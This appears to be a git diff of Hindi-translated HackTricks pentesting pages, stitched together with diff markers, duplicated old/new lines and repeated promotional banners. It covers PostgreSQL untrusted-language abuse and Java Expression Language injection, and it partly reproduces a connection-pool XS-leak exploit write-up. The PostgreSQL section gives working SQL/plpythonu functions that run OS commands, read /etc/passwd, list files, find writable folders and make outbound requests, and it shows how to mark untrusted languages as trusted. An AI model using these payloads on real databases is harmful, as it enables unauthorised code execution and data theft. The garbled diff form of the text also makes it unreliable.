<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
## PostgreSQL Languages
आपको पहुंचने वाला PostgreSQL डेटाबेस विभिन्न **स्क्रिप्टिंग भाषाएं स्थापित** हो सकती हैं जिन्हें आप **कोड को निषेधित करने** के लिए दुरुपयोग कर सकते हैं।
आप **उन्हें चला सकते हैं**:
```sql
\dL *
SELECT lanname,lanpltrusted,lanacl FROM pg_language;
```
अधिकांश स्क्रिप्टिंग भाषाओं को आप PostgreSQL में स्थापित कर सकते हैं जिनमें **2 प्रकार** होते हैं: **विश्वसनीय** और **अविश्वसनीय****अविश्वसनीय** भाषा का नाम **"u" से समाप्त होता है** और यह संस्करण आपको **कोड को निष्पादित** करने और अन्य रोचक फ़ंक्शन का उपयोग करने की अनुमति देगा। निम्नलिखित भाषाएं रुचिकर हो सकती हैं यदि इन्हें स्थापित किया जाए:
एक बार जब आप PostgreSQL में स्क्रिप्टिंग भाषाएं इंस्टॉल कर लेते हैं, तो उनके **2 प्रकार** होते हैं: **विश्वसनीय** और **अविश्वसनीय****अविश्वसनीय** नाम में **"u" से समाप्त** होगा और यह वह संस्करण होगा जिससे आपको **कोड को निष्पादित** करने और अन्य दिलचस्प फ़ंक्शन का उपयोग करने की अनुमति होगी। ये ऐसी भाषाएं हैं जो यदि इंस्टॉल की जाती हैं तो दिलचस्प होती हैं:
* **plpythonu**
* **plpython3u**
* **plperlu**
* **pljavaU**
* **plrubyu**
* ... (कोई भी अनुरक्षित संस्करण का उपयोग करने वाली अन्य कोई भाषा)
* ... (कोई भी अन्य प्रोग्रामिंग भाषा जो एक असुरक्षित संस्करण का उपयोग करती है)
{% hint style="warning" %}
यदि आपको लगता है कि कोई रुचिकर भाषा **स्थापित** है, लेकिन PostgreSQL द्वारा **अविश्वसनीय** मान्यता दी गई है (**`lanpltrusted`** की मान्यता **`false`** है), तो आप इसे निम्नलिखित पंक्ति के साथ **विश्वसनीय** बनाने का प्रयास कर सकते हैं ताकि PostgreSQL द्वारा कोई प्रतिबंध लागू न हो:
यदि आपको लगता है कि कोई दिलचस्प भाषा **इंस्टॉल की गई** है लेकिन PostgreSQL द्वारा **अविश्वसनीय** मानी जाती है (**`lanpltrusted`** **`false`** है), तो आप इसे **विश्वसनीय** बनाने की कोशिश कर सकते हैं ताकि PostgreSQL द्वारा कोई प्रतिबंध लागू न हो:
```sql
UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language
@ -27,7 +41,7 @@ SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_languag
{% endhint %}
{% hint style="danger" %}
यदि आप कोई भाषा नहीं देखते हैं, तो आप इसे लोड करने का प्रयास कर सकते हैं (**आपको सुपरएडमिन होना चाहिए**):
अगर आप किसी भाषा को नहीं देखते ह। तो आप इसे लोड करने की कोशिश कर सकते हैं (**आपको सुपर एडमिन होना चाहिए**):
```
CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u;
@ -37,7 +51,7 @@ CREATE EXTENSION plrubyu;
```
{% endhint %}
ध्यान दें कि सुरक्षित संस्करणों को "असुरक्षित" रूप में कंपाइल किया जा सकता है। उदाहरण के लिए [**यह**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) देखें। इसलिए यह हमेशा मूल्यांककरने योग्य होता है कि क्या आप कोड को निष्पादित कर सकते हैं, यदि आपको केवल **विश्वसनीय** वाला ही मिलता है
ध्यान दें कि सुरक्षित संस्करणों को "असुरक्षित" रूप में कॉम्पाइल करना संभव है। [**यह**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) की जाँच करें। उदाहरण के लिए। इसलिए यह हमेशा मूल्यान है कि क्या आप कोड को निष्पादित कर सकते हैं भले ही आपको केवल **विश्वसनीय** वाला ही मिले
## plpythonu/plpython3u
@ -55,7 +69,13 @@ LANGUAGE 'plpythonu';
SELECT cmd("ls"); #RCE with popen or execve
```
{% tab title="ओएस उपयोगकर्ता प्राप्त करें" %}
{% endtab %}
{% tab title="Get OS user" %}
ओएस उपयोगकर्ता प्राप्त करें
{% endtab %}
```sql
CREATE OR REPLACE FUNCTION get_user (pkg text)
RETURNS VARCHAR(65535) stable
@ -67,7 +87,9 @@ LANGUAGE 'plpythonu';
SELECT get_user(""); #Get user, para is useless
```
{% tab title="डायरेक्टरी की सूची बनाएं" %}
{% endtab %}
{% tab title="सूची डायरेक्टरी" %}
```sql
CREATE OR REPLACE FUNCTION lsdir (dir text)
RETURNS VARCHAR(65535) stable
@ -81,7 +103,9 @@ LANGUAGE 'plpythonu';
SELECT lsdir("/"); #List dir
```
{% tab title="W फ़ोल्डर ढूंढें" %}
{% endtab %}
{% tab title="डब्ल्यू फ़ोल्डर खोजें" %}
```sql
CREATE OR REPLACE FUNCTION findw (dir text)
RETURNS VARCHAR(65535) stable
@ -108,6 +132,8 @@ LANGUAGE 'plpythonu';
SELECT findw("/"); #Find Writable folders from a folder (recursively)
```
{% endtab %}
{% tab title="फ़ाइल खोजें" %}
```sql
CREATE OR REPLACE FUNCTION find_file (exe_sea text)
@ -141,7 +167,9 @@ LANGUAGE 'plpythonu';
SELECT find_file("psql"); #Find a file
```
{% tab title="एक्सीक्यूटेबल्स खोजें" %}
{% endtab %}
{% tab title="एक्जीक्यूटेबल्स खोजें" %}
```sql
CREATE OR REPLACE FUNCTION findx (dir text)
RETURNS VARCHAR(65535) stable
@ -173,7 +201,9 @@ LANGUAGE 'plpythonu';
SELECT findx("/"); #Find an executables in folder (recursively)
```
{% tab title="सब्स के द्वारा exec ढूंढें" %}
{% endtab %}
{% tab title="उपस्थिति द्वारा एक्सेक खोजें" %}
```sql
CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
RETURNS VARCHAR(65535) stable
@ -206,6 +236,8 @@ LANGUAGE 'plpythonu';
SELECT find_exe("psql"); #Find executable by susbstring
```
{% endtab %}
{% tab title="पढ़ें" %}
```sql
CREATE OR REPLACE FUNCTION read (path text)
@ -220,7 +252,9 @@ LANGUAGE 'plpythonu';
select read('/etc/passwd'); #Read a file in b64
```
{% tab title="परमिशन प्राप्त करें" %}
{% endtab %}
{% tab title="प्राप्त करें अनुमतियाँ" %}
```sql
CREATE OR REPLACE FUNCTION get_perms (path text)
RETURNS VARCHAR(65535) stable
@ -234,6 +268,8 @@ LANGUAGE 'plpythonu';
select get_perms("/etc/passwd"); # Get perms of file
```
{% endtab %}
{% tab title="अनुरोध" %}
```sql
CREATE OR REPLACE FUNCTION req2 (url text)
@ -258,12 +294,9 @@ LANGUAGE 'plpythonu';
SELECT req3('https://google.com'); #Request using python3
```
{% endtab %}
{% endtabs %}
## pgSQL
निम्नलिखित पृष्ठ की जाच करें:
निम्नलिखित पृष्ठ की जाँच करें:
{% content-ref url="pl-pgsql-password-bruteforce.md" %}
[pl-pgsql-password-bruteforce.md](pl-pgsql-password-bruteforce.md)
@ -271,7 +304,7 @@ SELECT req3('https://google.com'); #Request using python3
## C
निम्नलिखित पृष्ठ की जाच करें:
निम्नलिखित पृष्ठ की जाच करें:
{% content-ref url="rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](rce-with-postgresql-extensions.md)
@ -281,10 +314,10 @@ SELECT req3('https://google.com'); #Request using python3
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण का पीएएसएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में **पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## मूल जानकारी
एक्सप्रेशन भाषा (EL) जावा ईई में प्रमुख है जो प्रस्तुति परत (जैसे, वेब पेज) और एप्लिकेशन तर्क (जैसे, प्रबंधित बीन्स) को जोड़ने के लिए है, उनके बीच इंटरैक्शन संभावित करता है। यह प्रमुखतः इस्तेमाल होता है:
एक्सप्रेशन भाषा (EL) जावा ईई में प्रमुख है जो प्रस्तुति स्तर (जैसे, वेब पेज) और एप्लिकेशन लॉजिक (जैसे, प्रबंधित बीन्स) को जोड़ने के लिए है, उनके बीच इंटरैक्शन संभावित करता है। यह प्रमुखतः इस्तेमाल होता है:
- **जावासर्वर फेसेस (जेएसएफ)**: यूआई कंपोनेंट्स को बैकएंड डेटा/क्रियाओं से जोड़ने के लिए।
- **जावासर्वर पेज्स (जेएसपी)**: जेएसपी पेज्स में डेटा एक्सेस और परिवर्तन के लिए।
@ -23,9 +23,9 @@
**उपयोग संदर्भ**:
- **स्प्रिंग फ्रेमवर्क**: सुरक्षा और डेटा जैसे विभिन्न मॉड्यूलों में लागू।
- **सामान्य उपयोग**: जावा, कोटलिन, और स्काला जैसी जेवीएम आधारित भाषाओं में डेवलपर्स द्वारा SpEL एपीआई के माध्यम से।
- **सामान्य उपयोग**: जेवीएम आधारित भाषाओं जैसे जावा, कोटलिन, और स्काला में डेवलपर्स द्वारा SpEL एपीआई के माध्यम से।
ईएल जावा ईई प्रौद्योगिकियों, स्थानिक परिवेशों में मौजूद है, और `.jsp` या `.jsf` फ़ाइल एक्सटेंशन, स्टैक त्रुटियाँ, और हेडर्स में "सर्वलेट" जैसे शब्दों के माध्यम से पहचानी जा सकती है। हालांकि, इसकी विशेषताएँ और कुछ विशेष वर्णों का उपयोग संस्करण-विशेष हो सकता है।
ईएल जावा ईई प्रौद्योगिकियों, स्थानीय परिवेशों में मौजूद है, और `.jsp` या `.jsf` फ़ाइल एक्सटेंशन, स्टैक त्रुटियाँ, और "सर्वलेट" जैसे हेडर्स में शामिल हैं। हालांकि, इसकी विशेषताएँ और कुछ विशेष वर्णों का उपयोग संस्करण-विशेष हो सकता है।
{% hint style="info" %}
**ईएल संस्करण** के आधार पर कुछ **विशेषताएँ** **ऑन** या **ऑफ** हो सकती हैं और सामान्यत: कुछ **वर्ण** **अनुमति नहीं** हो सकते हैं।
@ -33,7 +33,7 @@
## मूल उदाहरण
(आप एक और दिलचस्प ट्यूटोरियल एल में पा सकते हैं [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
(आप एक और दिलचस्प ट्यूटोरियल एल के बारे में पा सकते हैं [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
[**Maven**](https://mvnrepository.com) रिपॉजिटरी से जार फ़ाइलें डाउनलोड करें:
@ -108,7 +108,7 @@ Enter a String to evaluate:
```
### पता लगाना
* Burp पता लगाना
* बर्प पता लगाना
```bash
gk6q${"zkz".toString().replace("k", "x")}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
@ -228,12 +228,12 @@ ${employee.FirstName}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को फॉलो** करें।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह
* पाएं [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें एक** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को पीआर जमा करके।**
</details>

View file

@ -1,32 +1,32 @@
# Connection Pool by Destination उदाहरण
# Connection Pool by Destination Example
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को डाउनलोड करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>
[**इस एक्सप्लॉइट**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html) में, [**@terjanq**](https://twitter.com/terjanq) ने निम्नलिखित पृष्ठ में उल्लेखित चुनौती के लिए एक और समाधान प्रस्तावित किया है:
[**इस एक्सप्लॉइट**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html) में, [**@terjanq**](https://twitter.com/terjanq) ने निम्नलिखित पृष्ठ में उल्लिखित चुनौती के लिए एक और समाधान प्रस्तुत किया है:
{% content-ref url="connection-pool-by-destination-example.md" %}
[connection-pool-by-destination-example.md](connection-pool-by-destination-example.md)
{% endcontent-ref %}
चलिए देखें कि यह एक्सप्लॉइट कैसे काम करता है:
चलिए देख हैं कि यह एक्सप्लॉइट कैसे काम करता है:
* हमलावर एक नोट में एक से अधिक **`<img`** टैग डालेगा जो **`/js/purify.js`** लोड करेगा (अधिकांशतः 6 से अधिक ताकि मूल्यांकन को ब्लॉक किया जा सके)।
* फिर, हमलावर नोट को **निकालेगा** जिसका सूचकांक 1 होगा
* फिर, हमलावर \[बॉट को पृष्ठ लोड करने के लिए] **बनाएंगे** और एक **अनुरोध** भेजेंगे **`victim.com/js/purify.js`** को जिसे वह **समय** करेगा।
* यदि समय **अधिक** है, तो **नोट** में हमला था, यदि समय **कम** है, तो उसमें **फ्लैग** था।
* हमलावर एक नोट डालेगा जिसमें जितने भी **`<img`** टैग होंगे जो **`/js/purify.js`** को **लोड** करेंगे (6 से अधिक ताकि मूल को ब्लॉक किया जा सके)।
* फिर, हमलावर नोट को इंडेक्स 1 से **हटा देगा**
* फिर, हमलावर \[शेष नोट के साथ पृष्ठ तक पहुंचने के लिए बॉट को एक्सेस कराएगा] और **`victim.com/js/purify.js`** पर एक **अनुरोध** भेजेगा जिसे वह **समय** करेगा।
* यदि समय **अधिक** है, तो **हमलावा** नोट में था, अगर समय **कम** है, तो **झंडा** वहां था।
{% hint style="info" %}
सच कहूं तो, स्क्रिप्ट पढ़ते समय मुझे वहां कुछ ऐसा हिस्सा दिखाई नहीं दिया जहां **हमलावर बॉट को पृष्ठ लोड करने के लिए ट्रिगर करता है**, मैं कोड में ऐसा कुछ नहीं देख रहा हूँ।
सच कहूं, स्क्रिप्ट पढ़ते समय मुझे कुछ भाग छूट गया जहां **हमलावर बॉट को पृष्ठ लोड करने के लिए ट्रिगर करता है ताकि छवि टैग्स लोड हों**, मुझे कोड में ऐसा कुछ नहीं दिखाई देता
{% endhint %}
```html
<html>
@ -124,10 +124,10 @@ break;
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**.
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>

View file

@ -1,18 +1,18 @@
# कुकी बम्ब + ऑनएरर XS लीक
# कुकी बम्ब + ऑनएरर XS लीक
<details>
